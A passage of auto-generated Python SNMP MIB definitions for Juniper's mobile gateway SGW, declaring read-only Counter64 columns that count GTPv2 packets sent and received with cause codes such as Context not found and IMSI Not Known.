if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNPTSIAdbrRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwPPGtpV2ICsNPTSIAdbrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 99), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNPTSIAdbrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNPTSIAdbrTx.setDescription('Number of GTP packets sent with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwPPGtpV2ICsCtxNotFndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 100), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCtxNotFndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCtxNotFndRx.setDescription('Number of GTPV2 packets received with cause Context not found.')
jnxMbgSgwPPGtpV2ICsCtxNotFndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 101), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCtxNotFndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCtxNotFndTx.setDescription('Number of GTP packets sent with cause Context not found.')
jnxMbgSgwPPGtpV2ICsInvMsgFmtRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 102), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvMsgFmtRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvMsgFmtRx.setDescription('Number of GTPV2 packets received with cause Invalid Message Format.')
jnxMbgSgwPPGtpV2ICsInvMsgFmtTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 103), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvMsgFmtTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvMsgFmtTx.setDescription('Number of GTP packets sent with cause Invalid Message Format.')
jnxMbgSgwPPGtpV2ICsVerNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 104), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsVerNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsVerNotSuppRx.setDescription('Number of GTPV2 packets received with cause Version not Supported.')
jnxMbgSgwPPGtpV2ICsVerNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 105), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsVerNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsVerNotSuppTx.setDescription('Number of GTP packets sent with cause Version not Supported.')
jnxMbgSgwPPGtpV2ICsInvLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 106), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvLenRx.setDescription('Number of GTPV2 packets received with cause Invalid Length.')
jnxMbgSgwPPGtpV2ICsInvLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 107), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvLenTx.setDescription('Number of GTP packets sent with cause Invalid Length.')
jnxMbgSgwPPGtpV2ICsServNotSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 108), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServNotSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServNotSupRx.setDescription('Number of GTPV2 packets received with cause Service Not supported.')
jnxMbgSgwPPGtpV2ICsServNotSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 109), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServNotSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServNotSupTx.setDescription('Number of GTP packets sent with cause Service Not supported.')
jnxMbgSgwPPGtpV2ICsManIEIncorRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 110), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEIncorRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEIncorRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE incorrect.')
jnxMbgSgwPPGtpV2ICsManIEIncorTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 111), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEIncorTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEIncorTx.setDescription('Number of GTP packets sent with cause Mandatory IE incorrect.')
jnxMbgSgwPPGtpV2ICsManIEMissRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 112), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEMissRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEMissRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE Missing.')
jnxMbgSgwPPGtpV2ICsManIEMissTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 113), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEMissTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsManIEMissTx.setDescription('Number of GTP packets sent with cause Mandatory IE Missing.')
jnxMbgSgwPPGtpV2ICsOptIEIncorRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 114), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsOptIEIncorRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsOptIEIncorRx.setDescription('Number of GTPV2 packets received with cause Optional IE Incorrect.')
jnxMbgSgwPPGtpV2ICsOptIEIncorTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 115), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsOptIEIncorTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsOptIEIncorTx.setDescription('Number of GTP packets sent with cause Optional IE Incorrect.')
jnxMbgSgwPPGtpV2ICsSysFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 116), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSysFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSysFailRx.setDescription('Number of GTPV2 packets received with cause System Failure.')
jnxMbgSgwPPGtpV2ICsSysFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 117), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSysFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSysFailTx.setDescription('Number of GTP packets sent with cause System Failure.')
jnxMbgSgwPPGtpV2ICsNoResRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 118), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoResRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoResRx.setDescription('Number of GTPV2 packets received with cause No Resource.')
jnxMbgSgwPPGtpV2ICsNoResTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 119), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoResTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoResTx.setDescription('Number of GTP packets sent with cause No Resource.')
jnxMbgSgwPPGtpV2ICsTFTSMANTErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 120), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSMANTErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSMANTErRx.setDescription('Number of GTPV2 packets received with cause TFT Symantic Error.')
jnxMbgSgwPPGtpV2ICsTFTSMANTErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 121), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSMANTErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSMANTErTx.setDescription('Number of GTP packets sent with cause TFT Symantic Error.')
jnxMbgSgwPPGtpV2ICsTFTSysErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 122), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSysErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSysErrRx.setDescription('Number of GTPV2 packets received with cause TFT System Error.')
jnxMbgSgwPPGtpV2ICsTFTSysErrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 123), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSysErrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsTFTSysErrTx.setDescription('Number of GTP packets sent with cause TFT System Error.')
jnxMbgSgwPPGtpV2ICsPkFltManErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 124), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltManErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltManErRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Symantic Error.')
jnxMbgSgwPPGtpV2ICsPkFltManErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 125), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltManErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltManErTx.setDescription('Number of GTP packets sent with cause Packet Filter Symantic Error.')
jnxMbgSgwPPGtpV2ICsPkFltSynErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 126), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltSynErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltSynErRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Syntax Error.')
jnxMbgSgwPPGtpV2ICsPkFltSynErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 127), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltSynErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPkFltSynErTx.setDescription('Number of GTP packets sent with cause Packet Filter Syntax Error.')
jnxMbgSgwPPGtpV2ICsMisUnknAPNRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 128), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsMisUnknAPNRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsMisUnknAPNRx.setDescription('Number of GTPV2 packets received with cause Unknown APN.')
jnxMbgSgwPPGtpV2ICsMisUnknAPNTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 129), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsMisUnknAPNTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsMisUnknAPNTx.setDescription('Number of GTP packets sent with cause Unknown APN.')
jnxMbgSgwPPGtpV2ICsUnexpRptIERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 130), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnexpRptIERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnexpRptIERx.setDescription('Number of GTPV2 packets received with cause Unexpected Repeated IE.')
jnxMbgSgwPPGtpV2ICsUnexpRptIETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 131), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnexpRptIETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnexpRptIETx.setDescription('Number of GTP packets sent with cause Unexpected Repeated IE.')
jnxMbgSgwPPGtpV2ICsGREKeyNtFdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 132), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsGREKeyNtFdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsGREKeyNtFdRx.setDescription('Number of GTPV2 packets received with cause GRE Key Not Found.')
jnxMbgSgwPPGtpV2ICsGREKeyNtFdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 133), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsGREKeyNtFdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsGREKeyNtFdTx.setDescription('Number of GTP packets sent with cause GRE Key Not Found.')
jnxMbgSgwPPGtpV2ICsRelocFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 134), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRelocFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRelocFailRx.setDescription('Number of GTPV2 packets received with cause Relocation Failed.')
jnxMbgSgwPPGtpV2ICsRelocFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 135), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRelocFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRelocFailTx.setDescription('Number of GTP packets sent with cause Relocation Failed.')
jnxMbgSgwPPGtpV2ICsDenINRatRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 136), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDenINRatRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDenINRatRx.setDescription('Number of GTPV2 packets received with cause Denied in RAT.')
jnxMbgSgwPPGtpV2ICsDenINRatTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 137), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDenINRatTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDenINRatTx.setDescription('Number of GTP packets sent with cause Denied in RAT.')
jnxMbgSgwPPGtpV2ICsPTNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 138), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTNotSuppRx.setDescription('Number of GTPV2 packets received with cause PDN Type Not Supported.')
jnxMbgSgwPPGtpV2ICsPTNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 139), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTNotSuppTx.setDescription('Number of GTP packets sent with cause PDN Type Not Supported.')
jnxMbgSgwPPGtpV2ICsAllDynAdOcRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 140), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAllDynAdOcRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAllDynAdOcRx.setDescription('Number of GTPV2 packets received with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwPPGtpV2ICsAllDynAdOcTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 141), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAllDynAdOcTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAllDynAdOcTx.setDescription('Number of GTP packets sent with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwPPGtpV2ICsNOTFTUECTXRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 142), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNOTFTUECTXRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNOTFTUECTXRx.setDescription('Number of GTPV2 packets received with cause UE Context Without TFT Exists.')
jnxMbgSgwPPGtpV2ICsNOTFTUECTXTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 143), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNOTFTUECTXTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNOTFTUECTXTx.setDescription('Number of GTP packets sent with cause UE Context Without TFT Exists.')
jnxMbgSgwPPGtpV2ICsProtoNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 144), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsProtoNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsProtoNtSupRx.setDescription('Number of GTPV2 packets received with cause Protocol Not Supported.')
jnxMbgSgwPPGtpV2ICsProtoNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 145), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsProtoNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsProtoNtSupTx.setDescription('Number of GTP packets sent with cause Protocol Not Supported.')
jnxMbgSgwPPGtpV2ICsUENotRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 146), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUENotRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUENotRespRx.setDescription('Number of GTPV2 packets received with cause UE Not Responding.')
jnxMbgSgwPPGtpV2ICsUENotRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 147), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUENotRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUENotRespTx.setDescription('Number of GTP packets sent with cause UE Not Responding.')
jnxMbgSgwPPGtpV2ICsUERefusesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 148), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUERefusesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUERefusesRx.setDescription('Number of GTPV2 packets received with cause UE Refuses.')
jnxMbgSgwPPGtpV2ICsUERefusesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 149), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUERefusesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUERefusesTx.setDescription('Number of GTP packets sent with cause UE Refuses.')
jnxMbgSgwPPGtpV2ICsServDeniedRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 150), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServDeniedRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServDeniedRx.setDescription('Number of GTPV2 packets received with cause Service Denied.')
jnxMbgSgwPPGtpV2ICsServDeniedTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 151), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServDeniedTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsServDeniedTx.setDescription('Number of GTP packets sent with cause Service Denied.')
jnxMbgSgwPPGtpV2ICsUnabPageUERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 152), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnabPageUERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnabPageUERx.setDescription('Number of GTPV2 packets received with cause Unable to Page UE.')
jnxMbgSgwPPGtpV2ICsUnabPageUETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 153), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnabPageUETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnabPageUETx.setDescription('Number of GTP packets sent with cause Unable to Page UE.')
jnxMbgSgwPPGtpV2ICsNoMemRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 154), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoMemRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoMemRx.setDescription('Number of GTPV2 packets received with cause No Memory.')
jnxMbgSgwPPGtpV2ICsNoMemTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 155), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoMemTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNoMemTx.setDescription('Number of GTP packets sent with cause No Memory.')
jnxMbgSgwPPGtpV2ICsUserAUTHFlRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 156), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUserAUTHFlRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUserAUTHFlRx.setDescription('Number of GTPV2 packets received with cause User AUTH Failed.')
jnxMbgSgwPPGtpV2ICsUserAUTHFlTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 157), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUserAUTHFlTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUserAUTHFlTx.setDescription('Number of GTP packets sent with cause User AUTH Failed.')
jnxMbgSgwPPGtpV2ICsAPNAcsDenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 158), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNAcsDenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNAcsDenRx.setDescription('Number of GTPV2 packets received with cause APN Access Denied.')
jnxMbgSgwPPGtpV2ICsAPNAcsDenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 159), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNAcsDenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAPNAcsDenTx.setDescription('Number of GTP packets sent with cause APN Access Denied.')
jnxMbgSgwPPGtpV2ICsReqRejRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 160), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqRejRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqRejRx.setDescription('Number of GTPV2 packets received with cause Request Rejected.')
jnxMbgSgwPPGtpV2ICsReqRejTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 161), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqRejTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqRejTx.setDescription('Number of GTP packets sent with cause Request Rejected.')
jnxMbgSgwPPGtpV2ICsPTMSISigMMRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 162), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTMSISigMMRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTMSISigMMRx.setDescription('Number of GTPV2 packets received with cause P-TMSI Signature Mismatch.')
jnxMbgSgwPPGtpV2ICsPTMSISigMMTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 163), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTMSISigMMTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPTMSISigMMTx.setDescription('Number of GTP packets sent with cause P-TMSI Signature Mismatch.')
jnxMbgSgwPPGtpV2ICsIMSINotKnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 164), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsIMSINotKnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsIMSINotKnRx.setDescription('Number of GTPV2 packets received with cause IMSI Not Known.')
jnxMbgSgwPPGtpV2ICsIMSINotKnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 165), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsIMSINotKnTx.setStatus('current')
